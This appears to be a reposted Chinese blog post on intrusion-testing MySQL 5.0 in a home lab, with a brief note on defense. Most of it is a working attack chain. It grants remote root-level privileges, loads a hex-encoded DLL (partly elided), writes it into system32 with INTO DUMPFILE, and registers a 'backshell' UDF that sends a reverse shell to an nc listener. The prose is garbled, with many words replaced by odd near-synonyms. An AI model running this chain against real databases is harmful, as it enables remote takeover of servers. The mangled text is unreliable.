mysql5.0入侵測試和防備辦法分享。本站提示廣大學習愛好者:(mysql5.0入侵測試和防備辦法分享)文章只能為提供參考,不一定能成為您想要的結果。以下是mysql5.0入侵測試和防備辦法分享正文
在做了之前的SQL SERVER以後,便很想測驗考試一下MYSQL的入侵測試曾經防備,與年夜家一路分享。
總的來講,我一向在用的是MYSQL,對MYSQL比擬熟習,比擬較而言,感到MYSQL更平安,這只是我本身胡亂料想的,願望不要惹起甚麼爭辯神馬的。。。一本饅頭激發的血案。。。
正題之一
物理機:Win7
虛擬機:XP
賜與mysql長途權限:
grant all privileges on *.* to 數據庫賬號@賜與權限的IP identified by '數據庫暗碼';
flush privileges;
給物理機長途權限:
物理機勝利銜接上:
履行侵入測試前(有圖有本相):
履行侵入測試後(有圖有本相):
重啟前(有圖有本相):
重啟後(有圖有本相):
正題之二:
長途登錄以後寫入代碼,代碼在yyd.txt傍邊,然後在MySql中寫入文件:
Win7 打別的一個cmd,當地端口映照:nc -vv -l -p 端標語
虛擬機上:履行映照:select backshell("物理機IP",端標語);
這便履行了3306端口反彈CMD
(沒圖了。。。用到了一個nc軟件履行的映照)
yyd.txt年夜概內容:
et @a=concat('',
0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部門代碼...............0736875745f6465696e697400736875745f696e697400);
create table yyd(data LONGBLOB);
insert into yyd values("");updateyyd set data = @a;
select data from yyd into DUMPFILE 'c:\\windows\\system32\\yyd.dll';
CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';
正題之三:
防備
感到有點亂,重要是分享了兩種辦法入侵,然則防備那部門應當是XP上的MySql辦事封閉,然則早XP上做了很多多少測試,左後XP被我弄掛失落了。。。。好難看,只好把Win7上的MySql辦事拿出來了。
認為重要照樣長途銜接的成績,“假如MySql不開啟長途銜接的話我們照樣同伙”,開頑笑,假如MySql不開啟長途銜接的話入侵概率會小的許多。